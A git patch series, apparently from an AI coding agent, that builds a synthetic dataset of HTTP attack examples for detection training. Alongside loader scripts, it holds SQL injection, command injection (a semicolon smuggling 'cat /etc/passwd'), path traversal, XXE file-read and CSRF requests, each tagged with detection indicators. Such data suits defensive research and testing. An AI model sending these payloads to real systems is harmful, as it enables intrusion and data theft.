From 1c353e549ffa9c64b775307d457bbac598a374d8 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 28 Oct 2025 13:46:45 +0000 Subject: [PATCH 1/3] Initial plan From 5c10ba5fe191bf180bc6ebc3a3ba42e71964e7c5 Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 28 Oct 2025 13:52:47 +0000 Subject: [PATCH 2/3] Add comprehensive HTTP security dataset with examples and documentation Co-authored-by: rodolfovalentim <3588086+rodolfovalentim@users.noreply.github.com> --- README.md | 206 ++++++++++++++++++++++- dataset/command-injection/example-1.json | 29 ++++ dataset/csrf/example-1.json | 31 ++++ dataset/index.json | 72 ++++++++ dataset/path-traversal/example-1.json | 30 ++++ dataset/schema.json | 96 +++++++++++ dataset/sql-injection/example-1.json | 30 ++++ dataset/sql-injection/example-2.json | 29 ++++ dataset/xss/example-1.json | 29 ++++ dataset/xss/example-2.json | 29 ++++ dataset/xxe/example-1.json | 30 ++++ examples/load_dataset.js | 173 +++++++++++++++++++ examples/load_dataset.py | 143 ++++++++++++++++ 13 files changed, 926 insertions(+), 1 deletion(-) create mode 100644 dataset/command-injection/example-1.json create mode 100644 dataset/csrf/example-1.json create mode 100644 dataset/index.json create mode 100644 dataset/path-traversal/example-1.json create mode 100644 dataset/schema.json create mode 100644 dataset/sql-injection/example-1.json create mode 100644 dataset/sql-injection/example-2.json create mode 100644 dataset/xss/example-1.json create mode 100644 dataset/xss/example-2.json create mode 100644 dataset/xxe/example-1.json create mode 100644 examples/load_dataset.js create mode 100644 examples/load_dataset.py diff --git a/README.md b/README.md index dbfdca5..e416cf2 100644 --- a/README.md +++ b/README.md @@ -1 +1,205 @@ -# synthetic-security-dataset \ No newline at end of file +# Synthetic Security Dataset + +A comprehensive dataset of HTTP request and response examples demonstrating various types of malicious attacks. This dataset is designed for security research, training machine learning models for threat detection, and educational purposes. + +## Overview + +This repository contains synthetic examples of common web application security attacks, organized by attack category. Each example includes: + +- Complete HTTP request details (method, URL, headers, body) +- Corresponding HTTP response +- Attack vector description +- Malicious payload +- Detection indicators + +## Dataset Structure + +``` +dataset/ +├── schema.json # JSON schema defining the data structure +├── sql-injection/ # SQL injection attack examples +├── xss/ # Cross-Site Scripting (XSS) examples +├── csrf/ # Cross-Site Request Forgery examples +├── path-traversal/ # Directory/path traversal examples +├── command-injection/ # OS command injection examples +└── xxe/ # XML External Entity (XXE) examples +``` + +## Attack Categories + +### 1. SQL Injection +SQL injection attacks attempt to manipulate database queries by inserting malicious SQL code into input fields. + +**Examples:** +- Authentication bypass +- UNION-based data extraction +- Blind SQL injection + +### 2. Cross-Site Scripting (XSS) +XSS attacks inject malicious scripts into web pages viewed by other users. + +**Examples:** +- Reflected XSS via URL parameters +- Stored XSS via user-generated content +- DOM-based XSS + +### 3. Cross-Site Request Forgery (CSRF) +CSRF attacks trick users into executing unwanted actions on web applications where they're authenticated. + +**Examples:** +- State-changing requests without CSRF tokens +- Malicious form auto-submission + +### 4. Path Traversal +Path traversal attacks access files and directories outside the intended directory structure. + +**Examples:** +- Reading system files using dot-dot-slash sequences +- Accessing sensitive configuration files + +### 5. Command Injection +Command injection attacks execute arbitrary operating system commands on the server. + +**Examples:** +- Command chaining using semicolons +- Piping commands +- Command substitution + +### 6. XML External Entity (XXE) +XXE attacks exploit XML parsers that process external entity references. + +**Examples:** +- Local file disclosure +- Server-side request forgery (SSRF) +- Denial of service + +## Data Format + +Each attack example is stored as a JSON file following this structure: + +```json +{ + "id": "unique-identifier", + "category": "Attack Category", + "description": "Description of the attack scenario", + "severity": "critical|high|medium|low", + "request": { + "method": "HTTP_METHOD", + "url": "/path?params", + "headers": {}, + "body": "request body or null" + }, + "response": { + "status": 200, + "headers": {}, + "body": "response body" + }, + "attack_vector": "Explanation of how the attack works", + "payload": "The actual malicious payload", + "indicators": ["indicator1", "indicator2"] +} +``` + +See `dataset/schema.json` for the complete JSON schema definition. + +## Usage + +### Loading the Dataset + +#### Python +```python +import json +import os +from pathlib import Path + +def load_dataset(dataset_path='dataset'): + examples = [] + for category_dir in Path(dataset_path).iterdir(): + if category_dir.is_dir(): + for example_file in category_dir.glob('*.json'): + with open(example_file, 'r') as f: + examples.append(json.load(f)) + return examples + +# Load all examples +dataset = load_dataset() +print(f"Loaded {len(dataset)} attack examples") +``` + +#### JavaScript/Node.js +```javascript +const fs = require('fs'); +const path = require('path'); + +function loadDataset(datasetPath = 'dataset') { + const examples = []; + const categories = fs.readdirSync(datasetPath); + + categories.forEach(category => { + const categoryPath = path.join(datasetPath, category); + if (fs.statSync(categoryPath).isDirectory()) { + const files = fs.readdirSync(categoryPath); + files.forEach(file => { + if (file.endsWith('.json') && file !== 'schema.json') { + const data = JSON.parse( + fs.readFileSync(path.join(categoryPath, file), 'utf8') + ); + examples.push(data); + } + }); + } + }); + + return examples; +} + +// Load all examples +const dataset = loadDataset(); +console.log(`Loaded ${dataset.length} attack examples`); +``` + +### Filtering by Category + +```python +# Get all SQL injection examples +sql_injections = [ex for ex in dataset if ex['category'] == 'SQL Injection'] + +# Get all critical severity attacks +critical_attacks = [ex for ex in dataset if ex['severity'] == 'critical'] +``` + +## Use Cases + +1. **Security Training**: Educational resource for learning about common web vulnerabilities +2. **Machine Learning**: Training data for developing attack detection models +3. **Testing Security Tools**: Benchmark dataset for evaluating WAF, IDS/IPS systems +4. **Security Research**: Reference examples for studying attack patterns +5. **CTF Challenges**: Base material for capture-the-flag security exercises + +## Contributing + +Contributions are welcome! To add new attack examples: + +1. Follow the JSON schema defined in `dataset/schema.json` +2. Place the example in the appropriate category directory +3. Use descriptive IDs and clear descriptions +4. Include realistic HTTP headers and responses +5. Provide clear indicators for detection + +## Important Notes + +⚠️ **Warning**: This dataset contains examples of malicious attacks. Use only for: +- Educational purposes +- Security research +- Controlled testing environments +- Training security systems + +**DO NOT** use these examples to attack real systems. Unauthorized access to computer systems is illegal. + +## License + +This dataset is provided for educational and research purposes. Please use responsibly and ethically. + +## Disclaimer + +The examples in this dataset are synthetic and created for educational purposes. They should only be used in controlled environments with proper authorization. The maintainers are not responsible for any misuse of this information. \ No newline at end of file diff --git a/dataset/command-injection/example-1.json b/dataset/command-injection/example-1.json new file mode 100644 index 0000000..27bf765 --- /dev/null +++ b/dataset/command-injection/example-1.json @@ -0,0 +1,29 @@ +{ + "id": "command-injection-001", + "category": "Command Injection", + "description": "OS command injection through ping utility", + "severity": "critical", + "request": { + "method": "POST", + "url": "/network-tools/ping", + "headers": { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" + }, + "body": "{\"host\": \"8.8.8.8; cat /etc/passwd\"}" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/plain" + }, + "body": "PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=64 time=0.045 ms\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + }, + "attack_vector": "Command injection using semicolon to chain commands", + "payload": "8.8.8.8; cat /etc/passwd", + "indicators": [ + "Command separators (;, &&, ||)", + "System commands in user input", + "Unexpected command output in response" + ] +} diff --git a/dataset/csrf/example-1.json b/dataset/csrf/example-1.json new file mode 100644 index 0000000..c29f31e --- /dev/null +++ b/dataset/csrf/example-1.json @@ -0,0 +1,31 @@ +{ + "id": "csrf-001", + "category": "Cross-Site Request Forgery (CSRF)", + "description": "CSRF attack to transfer funds without user consent", + "severity": "high", + "request": { + "method": "POST", + "url": "/transfer", + "headers": { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", + "Referer": "http://attacker.com/malicious.html", + "Cookie": "session=victim_session_token" + }, + "body": "to_account=attacker_account&amount=1000¤cy=USD" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/json" + }, + "body": "{\"status\": \"success\", \"message\": \"Transfer completed\", \"transaction_id\": \"txn_987654\"}" + }, + "attack_vector": "CSRF attack initiated from external malicious site", + "payload": "Malicious HTML form auto-submitting to transfer endpoint", + "indicators": [ + "Missing or invalid CSRF token", + "Referer from external domain", + "Unexpected state-changing request" + ] +} diff --git a/dataset/index.json b/dataset/index.json new file mode 100644 index 0000000..10a34fe --- /dev/null +++ b/dataset/index.json @@ -0,0 +1,72 @@ +{ + "dataset_version": "1.0.0", + "created_date": "2025-10-28", + "description": "Synthetic HTTP request/response dataset for malicious attack examples", + "total_examples": 8, + "categories": { + "SQL Injection": { + "count": 2, + "severity_distribution": { + "critical": 2 + }, + "examples": [ + "dataset/sql-injection/example-1.json", + "dataset/sql-injection/example-2.json" + ] + }, + "Cross-Site Scripting (XSS)": { + "count": 2, + "severity_distribution": { + "high": 2 + }, + "examples": [ + "dataset/xss/example-1.json", + "dataset/xss/example-2.json" + ] + }, + "Cross-Site Request Forgery (CSRF)": { + "count": 1, + "severity_distribution": { + "high": 1 + }, + "examples": [ + "dataset/csrf/example-1.json" + ] + }, + "Path Traversal": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/path-traversal/example-1.json" + ] + }, + "Command Injection": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/command-injection/example-1.json" + ] + }, + "XML External Entity (XXE)": { + "count": 1, + "severity_distribution": { + "critical": 1 + }, + "examples": [ + "dataset/xxe/example-1.json" + ] + } + }, + "severity_overview": { + "critical": 5, + "high": 3, + "medium": 0, + "low": 0 + }, + "schema_version": "1.0.0", + "schema_location": "dataset/schema.json" +} diff --git a/dataset/path-traversal/example-1.json b/dataset/path-traversal/example-1.json new file mode 100644 index 0000000..5a07988 --- /dev/null +++ b/dataset/path-traversal/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "path-traversal-001", + "category": "Path Traversal", + "description": "Directory traversal attack to access sensitive files", + "severity": "critical", + "request": { + "method": "GET", + "url": "/download?file=../../../../etc/passwd", + "headers": { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)", + "Accept": "*/*" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/plain", + "Content-Disposition": "attachment; filename=passwd" + }, + "body": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin" + }, + "attack_vector": "Path traversal using dot-dot-slash sequences", + "payload": "../../../../etc/passwd", + "indicators": [ + "Dot-dot-slash sequences (../)", + "Access to system files", + "Path manipulation in file parameter" + ] +} diff --git a/dataset/schema.json b/dataset/schema.json new file mode 100644 index 0000000..bde1d4e --- /dev/null +++ b/dataset/schema.json @@ -0,0 +1,96 @@ +{ + "$schema": "http://json-schema.org/draft-07/schema#", + "title": "Synthetic Security Dataset Entry", + "description": "Schema for HTTP request/response examples of malicious attacks", + "type": "object", + "required": ["id", "category", "description", "severity", "request", "response", "attack_vector", "payload", "indicators"], + "properties": { + "id": { + "type": "string", + "description": "Unique identifier for the attack example", + "pattern": "^[a-z0-9-]+$" + }, + "category": { + "type": "string", + "description": "Attack category/type", + "enum": [ + "SQL Injection", + "Cross-Site Scripting (XSS)", + "Cross-Site Request Forgery (CSRF)", + "Path Traversal", + "Command Injection", + "XML External Entity (XXE)" + ] + }, + "description": { + "type": "string", + "description": "Detailed description of the attack scenario" + }, + "severity": { + "type": "string", + "description": "Severity level of the attack", + "enum": ["low", "medium", "high", "critical"] + }, + "request": { + "type": "object", + "description": "HTTP request details", + "required": ["method", "url", "headers"], + "properties": { + "method": { + "type": "string", + "description": "HTTP method", + "enum": ["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"] + }, + "url": { + "type": "string", + "description": "Request URL including path and query parameters" + }, + "headers": { + "type": "object", + "description": "HTTP request headers" + }, + "body": { + "type": ["string", "null"], + "description": "Request body content" + } + } + }, + "response": { + "type": "object", + "description": "HTTP response details", + "required": ["status", "headers", "body"], + "properties": { + "status": { + "type": "integer", + "description": "HTTP status code", + "minimum": 100, + "maximum": 599 + }, + "headers": { + "type": "object", + "description": "HTTP response headers" + }, + "body": { + "type": ["string", "null"], + "description": "Response body content" + } + } + }, + "attack_vector": { + "type": "string", + "description": "Explanation of how the attack works" + }, + "payload": { + "type": "string", + "description": "The actual malicious payload used in the attack" + }, + "indicators": { + "type": "array", + "description": "List of indicators that can help detect this type of attack", + "items": { + "type": "string" + }, + "minItems": 1 + } + } +} diff --git a/dataset/sql-injection/example-1.json b/dataset/sql-injection/example-1.json new file mode 100644 index 0000000..050634b --- /dev/null +++ b/dataset/sql-injection/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "sql-injection-001", + "category": "SQL Injection", + "description": "Classic SQL injection attack attempting to bypass authentication", + "severity": "critical", + "request": { + "method": "POST", + "url": "/login", + "headers": { + "Content-Type": "application/x-www-form-urlencoded", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" + }, + "body": "username=admin' OR '1'='1&password=anything" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/json", + "Set-Cookie": "session=abc123; HttpOnly; Secure" + }, + "body": "{\"status\": \"success\", \"message\": \"Login successful\", \"user_id\": 1}" + }, + "attack_vector": "Authentication bypass using SQL injection in username field", + "payload": "admin' OR '1'='1", + "indicators": [ + "SQL syntax in input fields", + "Quote characters in username", + "Logical operators (OR) in input" + ] +} diff --git a/dataset/sql-injection/example-2.json b/dataset/sql-injection/example-2.json new file mode 100644 index 0000000..5d847ec --- /dev/null +++ b/dataset/sql-injection/example-2.json @@ -0,0 +1,29 @@ +{ + "id": "sql-injection-002", + "category": "SQL Injection", + "description": "SQL injection using UNION-based attack to extract data", + "severity": "critical", + "request": { + "method": "GET", + "url": "/product?id=1' UNION SELECT username,password FROM users--", + "headers": { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", + "Accept": "text/html,application/xhtml+xml" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/html; charset=utf-8" + }, + "body": "

Product Details

admin:$2y$10$hashedpassword

" + }, + "attack_vector": "Data exfiltration using UNION-based SQL injection", + "payload": "1' UNION SELECT username,password FROM users--", + "indicators": [ + "UNION keyword in URL parameter", + "SQL comment markers (--)", + "Quote characters in parameter value" + ] +} diff --git a/dataset/xss/example-1.json b/dataset/xss/example-1.json new file mode 100644 index 0000000..7d4ea05 --- /dev/null +++ b/dataset/xss/example-1.json @@ -0,0 +1,29 @@ +{ + "id": "xss-001", + "category": "Cross-Site Scripting (XSS)", + "description": "Reflected XSS attack through URL parameter", + "severity": "high", + "request": { + "method": "GET", + "url": "/search?q=", + "headers": { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + "Accept": "text/html" + }, + "body": null + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "text/html; charset=utf-8" + }, + "body": "

Search Results for:

No results found

" + }, + "attack_vector": "Reflected XSS via search parameter", + "payload": "", + "indicators": [ + "Script tags in URL parameters", + "JavaScript code in input", + "Unescaped user input reflected in HTML" + ] +} diff --git a/dataset/xss/example-2.json b/dataset/xss/example-2.json new file mode 100644 index 0000000..7266858 --- /dev/null +++ b/dataset/xss/example-2.json @@ -0,0 +1,29 @@ +{ + "id": "xss-002", + "category": "Cross-Site Scripting (XSS)", + "description": "Stored XSS attack via comment submission", + "severity": "high", + "request": { + "method": "POST", + "url": "/comments", + "headers": { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)" + }, + "body": "{\"comment\": \"\", \"post_id\": 123}" + }, + "response": { + "status": 201, + "headers": { + "Content-Type": "application/json" + }, + "body": "{\"status\": \"success\", \"message\": \"Comment posted\", \"comment_id\": 456}" + }, + "attack_vector": "Stored XSS using malicious image tag with onerror event handler", + "payload": "", + "indicators": [ + "HTML tags in comment content", + "JavaScript event handlers (onerror)", + "External domain references" + ] +} diff --git a/dataset/xxe/example-1.json b/dataset/xxe/example-1.json new file mode 100644 index 0000000..acbc40f --- /dev/null +++ b/dataset/xxe/example-1.json @@ -0,0 +1,30 @@ +{ + "id": "xxe-001", + "category": "XML External Entity (XXE)", + "description": "XXE attack to read local files through XML parsing", + "severity": "critical", + "request": { + "method": "POST", + "url": "/api/xml/process", + "headers": { + "Content-Type": "application/xml", + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)" + }, + "body": "\n]>\n\n &xxe;\n" + }, + "response": { + "status": 200, + "headers": { + "Content-Type": "application/xml" + }, + "body": "\n\n root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n processed\n" + }, + "attack_vector": "XXE attack using external entity to read system files", + "payload": "", + "indicators": [ + "DOCTYPE declaration with ENTITY", + "SYSTEM keyword in XML", + "External entity references", + "File protocol in entity definition" + ] +} diff --git a/examples/load_dataset.js b/examples/load_dataset.js new file mode 100644 index 0000000..c2935de --- /dev/null +++ b/examples/load_dataset.js @@ -0,0 +1,173 @@ +#!/usr/bin/env node +/** + * Example script to load and analyze the synthetic security dataset using Node.js + */ + +const fs = require('fs'); +const path = require('path'); + +/** + * Load all attack examples from the dataset + * @param {string} datasetPath - Path to the dataset directory + * @returns {Array} Array of attack example objects + */ +function loadDataset(datasetPath = 'dataset') { + const examples = []; + + try { + const entries = fs.readdirSync(datasetPath); + + entries.forEach(entry => { + const entryPath = path.join(datasetPath, entry); + const stats = fs.statSync(entryPath); + + if (stats.isDirectory()) { + const files = fs.readdirSync(entryPath); + files.forEach(file => { + if (file.endsWith('.json')) { + const filePath = path.join(entryPath, file); + const data = JSON.parse(fs.readFileSync(filePath, 'utf8')); + data.file_path = filePath; + examples.push(data); + } + }); + } + }); + } catch (error) { + console.error('Error loading dataset:', error.message); + } + + return examples; +} + +/** + * Analyze the dataset and print statistics + * @param {Array} examples - Array of attack examples + */ +function analyzeDataset(examples) { + console.log('\n' + '='.repeat(60)); + console.log('Dataset Statistics'); + console.log('='.repeat(60) + '\n'); + + console.log(`Total Examples: ${examples.length}`); + + // Category distribution + const categories = {}; + examples.forEach(ex => { + categories[ex.category] = (categories[ex.category] || 0) + 1; + }); + + console.log('\nCategory Distribution:'); + Object.keys(categories).sort().forEach(category => { + console.log(` - ${category}: ${categories[category]}`); + }); + + // Severity distribution + const severities = {}; + examples.forEach(ex => { + severities[ex.severity] = (severities[ex.severity] || 0) + 1; + }); + + console.log('\nSeverity Distribution:'); + ['critical', 'high', 'medium', 'low'].forEach(severity => { + if (severities[severity]) { + console.log(` - ${severity.charAt(0).toUpperCase() + severity.slice(1)}: ${severities[severity]}`); + } + }); + + // HTTP methods + const methods = {}; + examples.forEach(ex => { + methods[ex.request.method] = (methods[ex.request.method] || 0) + 1; + }); + + console.log('\nHTTP Methods Used:'); + Object.keys(methods).sort().forEach(method => { + console.log(` - ${method}: ${methods[method]}`); + }); +} + +/** + * Display a formatted attack example + * @param {Object} example - Attack example object + */ +function showExample(example) { + console.log('\n' + '='.repeat(60)); + console.log(`Example: ${example.id}`); + console.log('='.repeat(60)); + console.log(`Category: ${example.category}`); + console.log(`Severity: ${example.severity.toUpperCase()}`); + console.log(`Description: ${example.description}`); + console.log(`\nAttack Vector: ${example.attack_vector}`); + console.log(`\nPayload: ${example.payload}`); + + console.log('\nHTTP Request:'); + console.log(` ${example.request.method} ${example.request.url}`); + console.log(' Headers:'); + Object.entries(example.request.headers).forEach(([key, value]) => { + console.log(` ${key}: ${value}`); + }); + if (example.request.body) { + const bodyPreview = example.request.body.length > 100 + ? example.request.body.substring(0, 100) + '...' + : example.request.body; + console.log(` Body: ${bodyPreview}`); + } + + console.log('\nHTTP Response:'); + console.log(` Status: ${example.response.status}`); + console.log(' Headers:'); + Object.entries(example.response.headers).forEach(([key, value]) => { + console.log(` ${key}: ${value}`); + }); + if (example.response.body) { + const bodyPreview = example.response.body.length > 100 + ? example.response.body.substring(0, 100) + '...' + : example.response.body; + console.log(` Body: ${bodyPreview}`); + } + + console.log('\nDetection Indicators:'); + example.indicators.forEach(indicator => { + console.log(` - ${indicator}`); + }); +} + +/** + * Main function to demonstrate dataset usage + */ +function main() { + console.log('Loading synthetic security dataset...'); + const examples = loadDataset(); + + // Analyze and show statistics + analyzeDataset(examples); + + // Show a few examples + console.log('\n\n' + '#'.repeat(60)); + console.log('Sample Attack Examples'); + console.log('#'.repeat(60)); + + // Show first example from each category + const shownCategories = new Set(); + for (const example of examples) { + if (!shownCategories.has(example.category)) { + showExample(example); + shownCategories.add(example.category); + if (shownCategories.size >= 3) { + break; + } + } + } + + console.log('\n' + '='.repeat(60)); + console.log('For more examples, explore the dataset/ directory'); + console.log('='.repeat(60) + '\n'); +} + +// Run the main function +if (require.main === module) { + main(); +} + +module.exports = { loadDataset, analyzeDataset, showExample }; diff --git a/examples/load_dataset.py b/examples/load_dataset.py new file mode 100644 index 0000000..c4f6230 --- /dev/null +++ b/examples/load_dataset.py @@ -0,0 +1,143 @@ +#!/usr/bin/env python3 +""" +Example script to load and analyze the synthetic security dataset. +""" + +import json +import os +from pathlib import Path +from collections import defaultdict + + +def load_dataset(dataset_path='dataset'): + """ + Load all attack examples from the dataset. + + Args: + dataset_path: Path to the dataset directory + + Returns: + List of attack example dictionaries + """ + examples = [] + dataset_dir = Path(dataset_path) + + for category_dir in dataset_dir.iterdir(): + if category_dir.is_dir(): + for example_file in category_dir.glob('*.json'): + with open(example_file, 'r') as f: + example = json.load(f) + example['file_path'] = str(example_file) + examples.append(example) + + return examples + + +def analyze_dataset(examples): + """ + Analyze the dataset and print statistics. + + Args: + examples: List of attack examples + """ + print(f"\n{'='*60}") + print(f"Dataset Statistics") + print(f"{'='*60}\n") + + print(f"Total Examples: {len(examples)}") + + # Category distribution + categories = defaultdict(int) + for ex in examples: + categories[ex['category']] += 1 + + print(f"\nCategory Distribution:") + for category, count in sorted(categories.items()): + print(f" - {category}: {count}") + + # Severity distribution + severities = defaultdict(int) + for ex in examples: + severities[ex['severity']] += 1 + + print(f"\nSeverity Distribution:") + for severity in ['critical', 'high', 'medium', 'low']: + if severity in severities: + print(f" - {severity.capitalize()}: {severities[severity]}") + + # HTTP methods + methods = defaultdict(int) + for ex in examples: + methods[ex['request']['method']] += 1 + + print(f"\nHTTP Methods Used:") + for method, count in sorted(methods.items()): + print(f" - {method}: {count}") + + +def show_example(example): + """ + Display a formatted attack example. + + Args: + example: Attack example dictionary + """ + print(f"\n{'='*60}") + print(f"Example: {example['id']}") + print(f"{'='*60}") + print(f"Category: {example['category']}") + print(f"Severity: {example['severity'].upper()}") + print(f"Description: {example['description']}") + print(f"\nAttack Vector: {example['attack_vector']}") + print(f"\nPayload: {example['payload']}") + print(f"\nHTTP Request:") + print(f" {example['request']['method']} {example['request']['url']}") + print(f" Headers:") + for key, value in example['request']['headers'].items(): + print(f" {key}: {value}") + if example['request']['body']: + print(f" Body: {example['request']['body'][:100]}...") + + print(f"\nHTTP Response:") + print(f" Status: {example['response']['status']}") + print(f" Headers:") + for key, value in example['response']['headers'].items(): + print(f" {key}: {value}") + if example['response']['body']: + print(f" Body: {example['response']['body'][:100]}...") + + print(f"\nDetection Indicators:") + for indicator in example['indicators']: + print(f" - {indicator}") + + +def main(): + """Main function to demonstrate dataset usage.""" + # Load the dataset + print("Loading synthetic security dataset...") + examples = load_dataset() + + # Analyze and show statistics + analyze_dataset(examples) + + # Show a few examples + print(f"\n\n{'#'*60}") + print("Sample Attack Examples") + print(f"{'#'*60}") + + # Show first example from each category + shown_categories = set() + for example in examples: + if example['category'] not in shown_categories: + show_example(example) + shown_categories.add(example['category']) + if len(shown_categories) >= 3: # Show only first 3 categories + break + + print(f"\n{'='*60}") + print(f"For more examples, explore the dataset/ directory") + print(f"{'='*60}\n") + + +if __name__ == '__main__': + main() From 40ebcda7c8c681a75007786faa2412e40ba54d0e Mon Sep 17 00:00:00 2001 From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com> Date: Tue, 28 Oct 2025 13:55:56 +0000 Subject: [PATCH 3/3] Add error handling to example scripts and fix README code samples Co-authored-by: rodolfovalentim <3588086+rodolfovalentim@users.noreply.github.com> --- README.md | 21 ++++++++++++++------- examples/load_dataset.js | 10 +++++++--- examples/load_dataset.py | 14 ++++++++++---- 3 files changed, 31 insertions(+), 14 deletions(-) diff --git a/README.md b/README.md index e416cf2..862b70e 100644 --- a/README.md +++ b/README.md @@ -117,8 +117,11 @@ def load_dataset(dataset_path='dataset'): for category_dir in Path(dataset_path).iterdir(): if category_dir.is_dir(): for example_file in category_dir.glob('*.json'): - with open(example_file, 'r') as f: - examples.append(json.load(f)) + try: + with open(example_file, 'r') as f: + examples.append(json.load(f)) + except json.JSONDecodeError as e: + print(f"Error parsing {example_file}: {e}") return examples # Load all examples @@ -140,11 +143,15 @@ function loadDataset(datasetPath = 'dataset') { if (fs.statSync(categoryPath).isDirectory()) { const files = fs.readdirSync(categoryPath); files.forEach(file => { - if (file.endsWith('.json') && file !== 'schema.json') { - const data = JSON.parse( - fs.readFileSync(path.join(categoryPath, file), 'utf8') - ); - examples.push(data); + if (file.endsWith('.json')) { + try { + const data = JSON.parse( + fs.readFileSync(path.join(categoryPath, file), 'utf8') + ); + examples.push(data); + } catch (error) { + console.error(`Error parsing ${file}:`, error.message); + } } }); } diff --git a/examples/load_dataset.js b/examples/load_dataset.js index c2935de..75eaeeb 100644 --- a/examples/load_dataset.js +++ b/examples/load_dataset.js @@ -26,9 +26,13 @@ function loadDataset(datasetPath = 'dataset') { files.forEach(file => { if (file.endsWith('.json')) { const filePath = path.join(entryPath, file); - const data = JSON.parse(fs.readFileSync(filePath, 'utf8')); - data.file_path = filePath; - examples.push(data); + try { + const data = JSON.parse(fs.readFileSync(filePath, 'utf8')); + data.file_path = filePath; + examples.push(data); + } catch (error) { + console.error(`Error parsing JSON in ${filePath}:`, error.message); + } } }); } diff --git a/examples/load_dataset.py b/examples/load_dataset.py index c4f6230..b7ff630 100644 --- a/examples/load_dataset.py +++ b/examples/load_dataset.py @@ -5,6 +5,7 @@ import json import os +import sys from pathlib import Path from collections import defaultdict @@ -25,10 +26,15 @@ def load_dataset(dataset_path='dataset'): for category_dir in dataset_dir.iterdir(): if category_dir.is_dir(): for example_file in category_dir.glob('*.json'): - with open(example_file, 'r') as f: - example = json.load(f) - example['file_path'] = str(example_file) - examples.append(example) + try: + with open(example_file, 'r') as f: + example = json.load(f) + example['file_path'] = str(example_file) + examples.append(example) + except json.JSONDecodeError as e: + print(f"Error parsing JSON in {example_file}: {e}", file=sys.stderr) + except Exception as e: + print(f"Error reading {example_file}: {e}", file=sys.stderr) return examples